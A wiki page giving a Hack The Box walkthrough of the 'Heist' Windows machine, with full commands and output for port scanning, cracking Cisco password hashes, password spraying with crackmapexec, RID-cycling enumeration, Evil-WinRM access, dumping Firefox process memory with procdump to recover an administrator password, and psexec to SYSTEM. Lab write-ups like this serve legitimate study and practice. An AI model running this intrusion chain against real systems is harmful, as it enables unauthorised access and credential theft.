Heist

From Luniwiki
Jump to: navigation, search

Back

Heist01.png

Ports scan

u505@kali:~/HTB/Machines/Heist$ sudo masscan -e tun0 -p1-65535,U:1-65535 10.10.10.149 --rate=1000
[sudo] password for u505:

Starting masscan 1.0.5 at 2020-03-06 13:29:45 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 445/tcp on 10.10.10.149 Discovered open port 5985/tcp on 10.10.10.149 Discovered open port 80/tcp on 10.10.10.149 Discovered open port 49668/tcp on 10.10.10.149 Discovered open port 135/tcp on 10.10.10.149
u505@kali:~/HTB/Machines/Heist$ nmap -sC -sV 10.10.10.149
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-06 08:29 EST
Nmap scan report for heist.htb (10.10.10.149)
Host is up (0.057s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE       VERSION
80/tcp  open  http          Microsoft IIS httpd 10.0
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp open  msrpc         Microsoft Windows RPC
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results: |_clock-skew: 1m34s | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-03-06T13:31:47 |_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 55.03 seconds

Nmap with missing ports

u505@kali:~/HTB/Machines/Heist$ nmap -sC -sV -p 80,135,445,5985,49668  10.10.10.149
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-06 08:35 EST
Nmap scan report for heist.htb (10.10.10.149)
Host is up (0.17s latency).

PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 | http-title: Support Login Page |_Requested resource was login.php 135/tcp open msrpc Microsoft Windows RPC 445/tcp open microsoft-ds? 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49668/tcp open msrpc Microsoft Windows RPC Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results: |_clock-skew: 1m34s | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-03-06T13:38:00 |_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 98.56 seconds

The port 5985 corresponds to WinRM over HTTP. (port 5986 is over HTTPS).

u505@kali:~/HTB/Machines/Heist$ /opt/utils/nmapAutomator/nmapAutomator.sh 10.10.10.149 All

Port 80

Heist02.png

Heist03.png

On port 80 there is a php web application.

Heist04.png

On the guest login, we access the issues page, the user hazard is enumerated, and he asks for a Windows account.

Heist05.png

The attachment discloses 2 new users names and 3 encrypted passwords.


Enumeration

u505@kali:~/HTB/Machines/Heist$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -r 1 -e "txt,php" -f -t 50 -u "Http://heist.htb"

_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: txt, php | HTTP method: get | Threads: 50 | Wordlist size: 13832 | Recursion level: 1
Error Log: /opt/utils/dirsearch/logs/errors-20-03-06_09-14-07.log
Target: Http://heist.htb
[09:14:08] Starting: [09:14:21] 403 - 1KB - /attachments/ [09:14:37] 403 - 1KB - /css/ [09:14:48] 200 - 1KB - /errorpage.php [09:15:00] 403 - 1KB - /images/ [09:15:00] 403 - 1KB - /Images/ [09:15:00] 302 - 0B - /index.php -> login.php [09:15:01] 302 - 0B - /index.php/ -> login.php [09:15:01] 302 - 0B - /Index.php -> login.php [09:15:03] 302 - 16B - /issues.php -> login.php [09:15:05] 403 - 1KB - /js/ [09:15:08] 200 - 2KB - /Login.php [09:15:08] 200 - 2KB - /login.php [09:16:00] Starting: attachments/ [09:16:24] 200 - 780B - /attachments/config.txt [09:17:49] Starting: css/ [09:19:30] Starting: images/ [09:21:13] Starting: Images/ [09:22:50] Starting: js/
Task Completed

The enumeration doesn't provide any new information other than that we discovered manually.

Passwords crack

In the page https://hashcat.net/wiki/doku.php?id=example_hashes, we can check that the password "5" is a Cisco-IOS md5crypt or mode 500 from hashcat.

u505@kali:~/HTB/Machines/Heist$ cat hash1.txt
$1$pdQG$o8nrSzsGXeaduXrjlvKc91
u505@kali:~/HTB/Machines/Heist$ hashcat -m 500 hash1.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
u505@kali:~/HTB/Machines/Heist$ hashcat -m 500 hash1.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --show
$1$pdQG$o8nrSzsGXeaduXrjlvKc91:stealth1agent

Password 7 from Cisco, are very reversible weak passwords and they were never intended to resist attack.

username rout3r password 7 0242114B0E143F015F5D1E161713

u505@kali:~/HTB/Machines/Heist$ python /opt/utils/ciscot7/ciscot7.py -p 0242114B0E143F015F5D1E161713 Decrypted password: $uperP@ssword
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
u505@kali:~/HTB/Machines/Heist$ python /opt/utils/ciscot7/ciscot7.py -p 02375012182C1A1D751618034F36415408
Decrypted password: Q4)sJu\Y8qz*A3?d

Port 445

Enumeration as guest

u505@kali:~/HTB/Machines/Heist$ python /opt/utils/nullinux/nullinux.py 10.10.10.149
u505@kali:~/HTB/Machines/Heist$ smbmap -u anonymous -H 10.10.10.149
u505@kali:~/HTB/Machines/Heist$ nmap -p 445 --script=smb-enum-shares 10.10.10.149
u505@kali:~/HTB/Machines/Heist$ enum4linux 10.10.10.149

As guest, no information is available.

Brute force known user and passwords

The utility crackmapexec allows us to test and try a list of users and passwords.

u505@kali:~/HTB/Machines/Heist$ cat users
admin
rout3r
hazard
u505@kali:~/HTB/Machines/Heist$ cat pass
Q4)sJu\Y8qz*A3?d
stealth1agent
$uperP@ssword 
u505@kali:~/HTB/Machines/Heist$ crackmapexec smb 10.10.10.149/32 -u users -p pass --continue-on-success
SMB         10.10.10.149    445    SUPPORTDESK      [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SUPPORTDESK) (signing:False) (SMBv1:False)
SMB         10.10.10.149    445    SUPPORTDESK      [-] SUPPORTDESK\admin:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB         10.10.10.149    445    SUPPORTDESK      [-] SUPPORTDESK\admin:stealth1agent STATUS_LOGON_FAILURE
SMB         10.10.10.149    445    SUPPORTDESK      [-] SUPPORTDESK\admin:$uperP@ssword STATUS_LOGON_FAILURE
SMB         10.10.10.149    445    SUPPORTDESK      [-] SUPPORTDESK\rout3r:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB         10.10.10.149    445    SUPPORTDESK      [-] SUPPORTDESK\rout3r:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SUPPORTDESK\rout3r:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SUPPORTDESK\hazard:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB         10.10.10.149    445    SUPPORTDESK      [+] SUPPORTDESK\hazard:stealth1agent
SMB         10.10.10.149    445    SUPPORTDESK      [-] SUPPORTDESK\hazard:$uperP@ssword STATUS_LOGON_FAILURE

We find a correct pair User and password for the user hazard.

Enumeration as hazard

With user hazard, we have some results on enumerations.

u505@kali:~/HTB/Machines/Heist$ smbmap -u hazard -p stealth1agent -H 10.10.10.149
u505@kali:~/HTB/Machines/Heist$ python /opt/utils/nullinux/nullinux.py -U hazard -P stealth1agent 10.10.10.149

But the information is useless. But we can try a RID cycling attack to enemurate users

u505@kali:~/HTB/Machines/Heist$ python /opt/utils/impacket/examples/lookupsid.py hazard:stealth1agent@10.10.10.149
Impacket v0.9.21.dev1+20200211.101047.70c38fbe - Copyright 2020 SecureAuth Corporation

[*] Brute forcing SIDs at 10.10.10.149 [*] StringBinding ncacn_np:10.10.10.149[\pipe\lsarpc] [*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112 500: SUPPORTDESK\Administrator (SidTypeUser) 501: SUPPORTDESK\Guest (SidTypeUser) 503: SUPPORTDESK\DefaultAccount (SidTypeUser) 504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser) 513: SUPPORTDESK\None (SidTypeGroup) 1008: SUPPORTDESK\Hazard (SidTypeUser) 1009: SUPPORTDESK\support (SidTypeUser) 1012: SUPPORTDESK\Chase (SidTypeUser) 1013: SUPPORTDESK\Jason (SidTypeUser)

The utility crackmapexec also provide a RID cycling attack module.

u505@kali:~/HTB/Machines/Heist$ crackmapexec smb 10.10.10.149/32 -u hazard -p stealth1agent --rid-brute
SMB         10.10.10.149    445    SUPPORTDESK      [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SUPPORTDESK) (signing:False) (SMBv1:False)
SMB         10.10.10.149    445    SUPPORTDESK      [+] SUPPORTDESK\hazard:stealth1agent
SMB         10.10.10.149    445    SUPPORTDESK      [+] Brute forcing RIDs
SMB         10.10.10.149    445    SUPPORTDESK      500: SUPPORTDESK\Administrator (SidTypeUser)
SMB         10.10.10.149    445    SUPPORTDESK      501: SUPPORTDESK\Guest (SidTypeUser)
SMB         10.10.10.149    445    SUPPORTDESK      503: SUPPORTDESK\DefaultAccount (SidTypeUser)
SMB         10.10.10.149    445    SUPPORTDESK      504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
SMB         10.10.10.149    445    SUPPORTDESK      513: SUPPORTDESK\None (SidTypeGroup)
SMB         10.10.10.149    445    SUPPORTDESK      1008: SUPPORTDESK\Hazard (SidTypeUser)
SMB         10.10.10.149    445    SUPPORTDESK      1009: SUPPORTDESK\support (SidTypeUser)
SMB         10.10.10.149    445    SUPPORTDESK      1012: SUPPORTDESK\Chase (SidTypeUser)
SMB         10.10.10.149    445    SUPPORTDESK      1013: SUPPORTDESK\Jason (SidTypeUser)

Brute force known user and password

We add the new users to the list (before hazard, because cramapexec fails stops when a valid user is found).

u505@kali:~/HTB/Machines/Heist$ cat users
Administrator
admin
rout3r
support
Chase
Jason
hazard
u505@kali:~/HTB/Machines/Heist$ cat pass
Q4)sJu\Y8qz*A3?d
stealth1agent
$uperP@ssword
u505@kali:~/HTB/Machines/Heist$ crackmapexec smb 10.10.10.149/32 -u users -p pass --shares
SMB         10.10.10.149    445    SUPPORTDESK      [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SUPPORTDESK) (signing:False) (SMBv1:False)
SMB         10.10.10.149    445    SUPPORTDESK      [-] SUPPORTDESK\Administrator:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB         10.10.10.149    445    SUPPORTDESK      [-] SUPPORTDESK\Administrator:stealth1agent STATUS_LOGON_FAILURE
SMB         10.10.10.149    445    SUPPORTDESK      [-] SUPPORTDESK\Administrator:$uperP@ssword STATUS_LOGON_FAILURE
SMB         10.10.10.149    445    SUPPORTDESK      [-] SUPPORTDESK\admin:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB         10.10.10.149    445    SUPPORTDESK      [-] SUPPORTDESK\admin:stealth1agent STATUS_LOGON_FAILURE
SMB         10.10.10.149    445    SUPPORTDESK      [-] SUPPORTDESK\admin:$uperP@ssword STATUS_LOGON_FAILURE
SMB         10.10.10.149    445    SUPPORTDESK      [-] SUPPORTDESK\rout3r:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB         10.10.10.149    445    SUPPORTDESK      [-] SUPPORTDESK\rout3r:stealth1agent STATUS_LOGON_FAILURE
SMB         10.10.10.149    445    SUPPORTDESK      [-] SUPPORTDESK\rout3r:$uperP@ssword STATUS_LOGON_FAILURE
SMB         10.10.10.149    445    SUPPORTDESK      [-] SUPPORTDESK\support:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB         10.10.10.149    445    SUPPORTDESK      [-] SUPPORTDESK\support:stealth1agent STATUS_LOGON_FAILURE
SMB         10.10.10.149    445    SUPPORTDESK      [-] SUPPORTDESK\support:$uperP@ssword STATUS_LOGON_FAILURE
SMB         10.10.10.149    445    SUPPORTDESK      [+] SUPPORTDESK\Chase:Q4)sJu\Y8qz*A3?d
SMB         10.10.10.149    445    SUPPORTDESK      [+] Enumerated shares
SMB         10.10.10.149    445    SUPPORTDESK      Share           Permissions     Remark
SMB         10.10.10.149    445    SUPPORTDESK      -----           -----------     ------
SMB         10.10.10.149    445    SUPPORTDESK      ADMIN$                          Remote Admin
SMB         10.10.10.149    445    SUPPORTDESK      C$                              Default share
SMB         10.10.10.149    445    SUPPORTDESK      IPC$            READ            Remote IPC

User flag

Winrm

When we try the winrm module of crackmapexec with a user that doesn't exists in the group BUILTIN\Remote Management Users

u505@kali:~/HTB/Machines/Heist$ crackmapexec winrm 10.10.10.149/32 -u hazard -p stealth1agent
WINRM       10.10.10.149    5985   NONE             [*] http://10.10.10.149:5985/wsman
WINRM       10.10.10.149    5985   NONE             [-] None\hazard:stealth1agent "the specified credentials were rejected by the server"

But for the user Chase, the behavior is different.

u505@kali:~/HTB/Machines/Heist$ crackmapexec winrm 10.10.10.149/32 -u Chase -p 'Q4)sJu\Y8qz*A3?d'
WINRM       10.10.10.149    5985   NONE             [*] http://10.10.10.149:5985/wsman
WARNING:urllib3.connectionpool:Failed to parse headers (url=http://10.10.10.149:5985/wsman): [StartBoundaryNotFoundDefect(), MultipartInvariantViolationDefect()], unparsed data: 
Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 441, in _make_request
    assert_header_parsing(httplib_response.msg)
  File "/usr/lib/python3/dist-packages/urllib3/util/response.py", line 71, in assert_header_parsing
    raise HeaderParsingError(defects=defects, unparsed_data=unparsed_data)
urllib3.exceptions.HeaderParsingError: [StartBoundaryNotFoundDefect(), MultipartInvariantViolationDefect()], unparsed data: 
WINRM       10.10.10.149    5985   NONE             [-] None\Chase:Q4)sJu\Y8qz*A3?d "Access is denied.  (extended fault data: {'transport_message': 'Bad HTTP response returned from server. Code 500', 'http_status_code': 500, 
'wsmanfault_code': '5', 'fault_code': 's:Sender', 'fault_subcode': 'w:AccessDenied'})"

We receive an access denied error instead of credential rejected.

Evil-WinRM

WinRM (Windows Remote Management) is included by Microsoft in their Operating Systems in order to make life easier to system administrators. Evil-WinRM is the a shell for hacking/pentesting. This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985), of course only if you have credentials and permissions to use it. And it seems that Chase user has permissions to use WinRM.

u505@kali:~/HTB/Machines/Heist$ evil-winrm -i 10.10.10.149 -u Chase -p 'Q4)sJu\Y8qz*A3?d'

Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
/usr/lib/ruby/vendor_ruby/net/ntlm/client/session.rb:39: warning: constant OpenSSL::Cipher::Cipher is deprecated /usr/lib/ruby/vendor_ruby/net/ntlm/client/session.rb:128: warning: constant OpenSSL::Cipher::Cipher is deprecated /usr/lib/ruby/vendor_ruby/net/ntlm/client/session.rb:138: warning: constant OpenSSL::Cipher::Cipher is deprecated *Evil-WinRM* PS C:\Users\Chase\Documents> whoami supportdesk\chase *Evil-WinRM* PS C:\Users\Chase\Documents> cd ..\Desktop *Evil-WinRM* PS C:\Users\Chase\Desktop> type user.txt <USER_FLAG>

Escalation of privileges

Running processes

*Evil-WinRM* PS C:\Users\Chase\Desktop> ps
/usr/lib/ruby/vendor_ruby/net/ntlm/client/session.rb:39: warning: constant OpenSSL::Cipher::Cipher is deprecated
/usr/lib/ruby/vendor_ruby/net/ntlm/client/session.rb:128: warning: constant OpenSSL::Cipher::Cipher is deprecated
/usr/lib/ruby/vendor_ruby/net/ntlm/client/session.rb:138: warning: constant OpenSSL::Cipher::Cipher is deprecated

Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName ------- ------ ----- ----- ------ -- -- ----------- 147 10 6616 11960 1016 0 conhost 501 19 2276 5360 404 0 csrss 290 17 2308 5128 492 1 csrss 358 15 3536 14416 5136 1 ctfmon 261 14 4212 13432 4000 0 dllhost 166 9 1848 9788 0.13 6652 1 dllhost 621 32 34468 59676 80 1 dwm 1495 58 24240 78924 5440 1 explorer 1112 62 103892 174384 11.16 6184 1 firefox 343 19 10000 37348 0.97 6308 1 firefox 408 31 17428 63468 1.23 6568 1 firefox 390 29 23044 56064 4.78 6996 1 firefox 358 25 16272 37732 0.67 7140 1 firefox 49 6 1436 3608 816 0 fontdrvhost 49 6 1804 4628 928 1 fontdrvhost 0 0 56 8 0 0 Idle 1006 23 5628 14300 644 0 lsass 153 8 1988 6412 3640 0 MpCmdRun 231 13 3076 10224 4220 0 msdtc 588 58 115160 98320 2956 0 MsMpEng 128 13 6460 13540 996 0 php-cgi 0 17 10652 78344 104 0 Registry 290 15 5076 16364 1208 1 RuntimeBroker 144 8 1632 7488 1620 1 RuntimeBroker 276 14 3024 15100 4724 1 RuntimeBroker 668 32 19948 61444 6100 1 SearchUI 578 11 5304 9688 624 0 services 700 29 15384 51476 5964 1 ShellExperienceHost 437 17 4996 23744 4528 1 sihost 53 3 528 1204 324 0 smss 475 23 5972 16296 2612 0 spoolsv 285 13 5004 11952 8 0 svchost 204 12 2072 9612 496 0 svchost 232 13 3108 13716 508 0 svchost 115 7 1244 5180 668 0 svchost 149 9 1840 11652 708 0 svchost 85 5 900 3756 768 0 svchost 874 21 7168 22532 792 0 svchost 172 9 4868 12772 832 0 svchost 908 16 5008 11432 868 0 svchost 252 10 2068 7580 940 0 svchost 389 13 14384 18120 1068 0 svchost 227 11 2896 10868 1120 0 svchost 140 7 1332 5604 1172 0 svchost 125 16 3532 7380 1192 0 svchost 223 9 2204 7384 1240 0 svchost 188 9 1812 7476 1272 0 svchost 235 12 2508 11076 1320 0 svchost 154 7 1248 5572 1328 0 svchost 432 9 2956 9000 1336 0 svchost 341 15 4560 11644 1424 0 svchost 382 18 5036 14076 1464 0 svchost 170 11 1808 7968 1484 0 svchost 247 14 3124 8292 1576 0 svchost 284 12 1876 7676 1588 0 svchost 323 10 2572 8320 1636 0 svchost 193 12 2180 11932 1752 0 svchost 163 10 2444 6976 1852 0 svchost 161 9 2032 7156 1912 0 svchost 405 32 7832 16732 1932 0 svchost 164 9 3308 7840 1968 0 svchost 198 11 1996 8040 1996 0 svchost 243 11 2668 9756 2036 0 svchost 353 19 14468 31412 2208 0 svchost 384 52 13784 18788 2604 0 svchost 248 25 3384 12512 2692 0 svchost 265 13 2548 7676 2700 0 svchost 547 21 13312 27792 2708 0 svchost 434 16 11208 19932 2716 0 svchost 166 12 4064 10816 2724 0 svchost 209 11 2324 8280 2760 0 svchost 137 9 1632 6452 2768 0 svchost 140 8 1524 6056 2816 0 svchost 126 7 1240 5280 2852 0 svchost 213 12 1816 7316 2924 0 svchost 240 15 4840 11844 2932 0 svchost 275 27 3168 11928 2940 0 svchost 168 10 2144 13064 2992 0 svchost 462 18 3472 11648 3016 0 svchost 386 23 3472 12176 3428 0 svchost 174 11 2620 13232 4144 0 svchost 126 7 1460 6364 4180 0 svchost 234 12 3152 13548 4252 1 svchost 226 13 2748 10716 4276 0 svchost 236 16 4212 13676 4548 0 svchost 365 18 5720 26340 4660 1 svchost 128 7 1236 5688 4672 0 svchost 190 11 5292 13636 4812 0 svchost 175 9 1492 7120 4948 0 svchost 266 13 3696 12884 5032 0 svchost 210 15 6440 10536 5072 0 svchost 249 14 3048 13616 5240 0 svchost 300 15 11216 12280 5460 0 svchost 120 7 1540 5936 6556 0 svchost 302 20 10708 14952 6892 0 svchost 2073 0 192 132 4 0 System 211 20 4068 12532 4752 1 taskhostw 283 17 12652 17096 4884 0 taskhostw 587 52 102992 105676 892 0 TiWorker 143 8 2080 7284 2180 0 TrustedInstaller 178 12 3224 10192 2904 0 VGAuthService 385 22 8680 21584 2896 0 vmtoolsd 245 18 3840 14976 5716 1 vmtoolsd 249 27 5796 14788 6080 0 w3wp 175 11 1492 6588 484 0 wininit 284 12 2852 12564 556 1 winlogon 350 16 8584 18232 4088 0 WmiPrvSE 313 17 22696 30996 5188 0 WmiPrvSE 1078 27 69248 87488 4.14 3960 0 wsmprovhost

There are some firefox process running on this server.

Procdump

We use the procdump utility (from sysinetrnals downloaded form Microsoft technet) to dump the memory of the more memory consuming firefox process.

*Evil-WinRM* PS C:\Users\Chase\Desktop> upload /opt/utils/Sysinternals/procdump.exe
Info: Uploading /opt/utils/Sysinternals/procdump.exe to C:\Users\Chase\Desktop\procdump.exe

/usr/lib/ruby/vendor_ruby/net/ntlm/client/session.rb:39: warning: constant OpenSSL::Cipher::Cipher is deprecated /usr/lib/ruby/vendor_ruby/net/ntlm/client/session.rb:128: warning: constant OpenSSL::Cipher::Cipher is deprecated /usr/lib/ruby/vendor_ruby/net/ntlm/client/session.rb:138: warning: constant OpenSSL::Cipher::Cipher is deprecated
Data: 868564 bytes of 868564 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\Chase\Desktop> ./procdump.exe -mp 6184 -accepteula /usr/lib/ruby/vendor_ruby/net/ntlm/client/session.rb:39: warning: constant OpenSSL::Cipher::Cipher is deprecated /usr/lib/ruby/vendor_ruby/net/ntlm/client/session.rb:128: warning: constant OpenSSL::Cipher::Cipher is deprecated /usr/lib/ruby/vendor_ruby/net/ntlm/client/session.rb:138: warning: constant OpenSSL::Cipher::Cipher is deprecated
ProcDump v9.0 - Sysinternals process dump utility Copyright (C) 2009-2017 Mark Russinovich and Andrew Richards Sysinternals - www.sysinternals.com
[01:44:05] Dump 1 initiated: C:\Users\Chase\Desktop\firefox.exe_200306_014405.dmp [01:44:08] Dump 1 complete: 122 MB written in 2.5 seconds [01:44:08] Dump count reached.
*Evil-WinRM* PS C:\Users\Chase\Desktop> dir /usr/lib/ruby/vendor_ruby/net/ntlm/client/session.rb:39: warning: constant OpenSSL::Cipher::Cipher is deprecated /usr/lib/ruby/vendor_ruby/net/ntlm/client/session.rb:128: warning: constant OpenSSL::Cipher::Cipher is deprecated /usr/lib/ruby/vendor_ruby/net/ntlm/client/session.rb:138: warning: constant OpenSSL::Cipher::Cipher is deprecated
Directory: C:\Users\Chase\Desktop
Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 3/6/2020 1:44 AM 124424467 firefox.exe_200306_014405.dmp -a---- 3/6/2020 1:38 AM 651424 procdump.exe -a---- 4/22/2019 9:08 AM 121 todo.txt -a---- 4/22/2019 9:07 AM 32 user.txt
*Evil-WinRM* PS C:\Users\Chase\Desktop> download firefox.exe_200306_014405.dmp Info: Downloading C:\Users\Chase\Desktop\firefox.exe_200306_014405.dmp to firefox.exe_200306_014405.dmp
Info: Download successful!
*Evil-WinRM* PS C:\Users\Chase\Desktop> exit
Info: Exiting with code 0

Dump analysis

After a look to the dump we find some interesting lines

u505@kali:~/HTB/Machines/Heist$ strings firefox.exe_200306_014405.dmp | grep password | grep login.php
http://localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
http://localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
O^privateBrowsingId=1,p,:http://localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
:http://localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
http://localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
:http://localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
http://localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
"C:\Program Files\Mozilla Firefox\firefox.exe" localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=

Check credentials

Crackmapexec confirms that these are the Administrator credentials.

u505@kali:~/HTB/Machines/Heist$ crackmapexec smb 10.10.10.149/32 -u Administrator -p '4dD!5}x/re8]FBuZ'
SMB         10.10.10.149    445    SUPPORTDESK      [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SUPPORTDESK) (signing:False) (SMBv1:False)
SMB         10.10.10.149    445    SUPPORTDESK      [+] SUPPORTDESK\Administrator:4dD!5}x/re8]FBuZ (Pwn3d!)

And Administrator can winrm the server.

u505@kali:~/HTB/Machines/Heist$ crackmapexec winrm 10.10.10.149/32 -u Administrator -p '4dD!5}x/re8]FBuZ'
WINRM       10.10.10.149    5985   NONE             [*] http://10.10.10.149:5985/wsman
WARNING:urllib3.connectionpool:Failed to parse headers (url=http://10.10.10.149:5985/wsman): [StartBoundaryNotFoundDefect(), MultipartInvariantViolationDefect()], unparsed data: ''
Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 441, in _make_request
    assert_header_parsing(httplib_response.msg)
  File "/usr/lib/python3/dist-packages/urllib3/util/response.py", line 71, in assert_header_parsing
    raise HeaderParsingError(defects=defects, unparsed_data=unparsed_data)
urllib3.exceptions.HeaderParsingError: [StartBoundaryNotFoundDefect(), MultipartInvariantViolationDefect()], unparsed data: ''
WARNING:urllib3.connectionpool:Failed to parse headers (url=http://10.10.10.149:5985/wsman): [StartBoundaryNotFoundDefect(), MultipartInvariantViolationDefect()], unparsed data: ''
Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 441, in _make_request
    assert_header_parsing(httplib_response.msg)
  File "/usr/lib/python3/dist-packages/urllib3/util/response.py", line 71, in assert_header_parsing
    raise HeaderParsingError(defects=defects, unparsed_data=unparsed_data)
urllib3.exceptions.HeaderParsingError: [StartBoundaryNotFoundDefect(), MultipartInvariantViolationDefect()], unparsed data: ''
WARNING:urllib3.connectionpool:Failed to parse headers (url=http://10.10.10.149:5985/wsman): [StartBoundaryNotFoundDefect(), MultipartInvariantViolationDefect()], unparsed data: ''
Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 441, in _make_request
    assert_header_parsing(httplib_response.msg)
  File "/usr/lib/python3/dist-packages/urllib3/util/response.py", line 71, in assert_header_parsing
    raise HeaderParsingError(defects=defects, unparsed_data=unparsed_data)
urllib3.exceptions.HeaderParsingError: [StartBoundaryNotFoundDefect(), MultipartInvariantViolationDefect()], unparsed data: ''
WARNING:urllib3.connectionpool:Failed to parse headers (url=http://10.10.10.149:5985/wsman): [StartBoundaryNotFoundDefect(), MultipartInvariantViolationDefect()], unparsed data: ''
Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 441, in _make_request
    assert_header_parsing(httplib_response.msg)
  File "/usr/lib/python3/dist-packages/urllib3/util/response.py", line 71, in assert_header_parsing
    raise HeaderParsingError(defects=defects, unparsed_data=unparsed_data)
urllib3.exceptions.HeaderParsingError: [StartBoundaryNotFoundDefect(), MultipartInvariantViolationDefect()], unparsed data: ''
WARNING:urllib3.connectionpool:Failed to parse headers (url=http://10.10.10.149:5985/wsman): [StartBoundaryNotFoundDefect(), MultipartInvariantViolationDefect()], unparsed data: ''
Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 441, in _make_request
    assert_header_parsing(httplib_response.msg)
  File "/usr/lib/python3/dist-packages/urllib3/util/response.py", line 71, in assert_header_parsing
    raise HeaderParsingError(defects=defects, unparsed_data=unparsed_data)
urllib3.exceptions.HeaderParsingError: [StartBoundaryNotFoundDefect(), MultipartInvariantViolationDefect()], unparsed data: ''
WINRM       10.10.10.149    5985   NONE             [+] None\Administrator:4dD!5}x/re8]FBuZ (Pwn3d!)

Root Flag

psexec

We can gain a command shell with psexec from impacket

u505@kali:~/HTB/Machines/Heist$ python /opt/utils/impacket/examples/psexec.py administrator@heist.htb
Impacket v0.9.21.dev1+20200211.101047.70c38fbe - Copyright 2020 SecureAuth Corporation

Password: [*] Requesting shares on heist.htb..... [*] Found writable share ADMIN$ [*] Uploading file IAsjWNER.exe [*] Opening SVCManager on heist.htb..... [*] Creating service CLOC on heist.htb..... [*] Starting service CLOC..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.17763.437] (c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami nt authority\system C:\Windows\System32>cd C:\Users\Administrator\Desktop C:\Users\Administrator\Desktop>type root.txt <ROOT_FLAG> C:\Users\Administrator\Desktop>exit [*] Process cmd.exe finished with ErrorCode: 0, ReturnCode: 0 [*] Opening SVCManager on heist.htb..... [*] Stopping service CLOC..... [*] Removing service CLOC..... [*] Removing file IAsjWNER.exe.....

Evil-WinRM

Or as before we can gain a powershell access with Evil-WinRM

u505@kali:~/HTB/Machines/Heist$ evil-winrm -i 10.10.10.149 -u Administrator -p '4dD!5}x/re8]FBuZ'

Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
